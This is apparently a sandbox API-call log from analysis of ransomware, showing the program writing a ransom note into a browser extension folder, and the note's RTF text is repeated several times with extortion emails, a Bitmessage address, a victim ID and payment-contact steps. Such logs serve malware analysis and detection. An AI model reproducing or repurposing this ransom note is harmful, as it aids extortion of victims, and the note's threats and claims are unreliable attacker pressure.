\\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.561] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.562] CloseHandle (hObject=0x2c8) returned 1 [0278.562] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0278.562] GetLastError () returned 0x2 [0278.562] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.563] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.563] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.563] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring 